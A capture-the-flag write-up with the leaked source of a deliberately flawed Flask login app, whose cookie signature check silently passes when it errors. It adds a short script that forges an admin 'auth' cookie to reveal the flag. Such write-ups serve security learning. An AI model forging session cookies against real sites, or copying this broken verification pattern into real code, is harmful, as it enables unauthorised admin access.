Tags: python3 cookie
Rating: 1.0
Looking at the robots.txt file you'll find the full source code:
```
#!/usr/bin/env python3
from flask import (
Flask,
render_template,
request,
abort,
redirect,
make_response,
g,
jsonify,
)
import binascii
import hashlib
import json
app = Flask(__name__)
app.secret_key = open("secret_key", "r").read().strip()
FLAG = open("flag.txt", "r").read().strip()
def do_login(user, password, admin):
cookie = {"user": user, "password": password, "admin": admin}
cookie["digest"] = hashlib.sha512(
app.secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")
).hexdigest()
response = make_response(redirect("/"))
response.set_cookie("auth", binascii.hexlify(json.dumps(cookie).encode("utf8")))
return response
@app.route("/login", methods=["POST"])
def login():
user = request.form.get("user", "")
password = request.form.get("password", "")
if (
user != "hacker"
or hashlib.sha512(bytes(password, "ascii")).digest()
!= b"hackshackshackshackshackshackshackshackshackshackshackshackshack"
):
return abort(403)
return do_login(user, password, True)
def load_cookie():
cookie = {}
auth = request.cookies.get("auth")
if auth:
try:
cookie = json.loads(binascii.unhexlify(auth).decode("utf8"))
digest = cookie.pop("digest")
if (
digest
!= hashlib.sha512(
app.secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")
).hexdigest()
):
return False, {}
except:
pass
return True, cookie
@app.route("/logout", methods=["GET"])
def logout():
response = make_response(redirect("/"))
response.set_cookie("auth", "", expires=0)
return response
@app.route("/")
def index():
ok, cookie = load_cookie()
if not ok:
return abort(403)
return render_template(
"index.html",
user=cookie.get("user", None),
admin=cookie.get("admin", None),
flag=FLAG,
)
@app.route("/robots.txt")
def source():
return "
" + open(__file__).read() + "
"
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=1337)
```
Now the goal is quite clear. You need to craft a cookie that bypasses the check. Here's my code:
```
from flask import (
Flask,
render_template,
request,
abort,
redirect,
make_response,
g,
jsonify,
)
import binascii
import hashlib
import json
cookie = {"user": 'hacker', "password": 'password', "admin": True}
cookie["digest"] = 'hackshackshackshackshackshackshackshackshackshackshackshackshack'
print(binascii.hexlify(json.dumps(cookie).encode("utf8")))
```
```
$ python3 robots.py
b'7b2275736572223a20226861636b6572222c202270617373776f7264223a202270617373776f7264222c202261646d696e223a20747275652c2022646967657374223a20226861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b736861636b227d'
```
Flag: `flag{did_this_even_pass_code_review}`
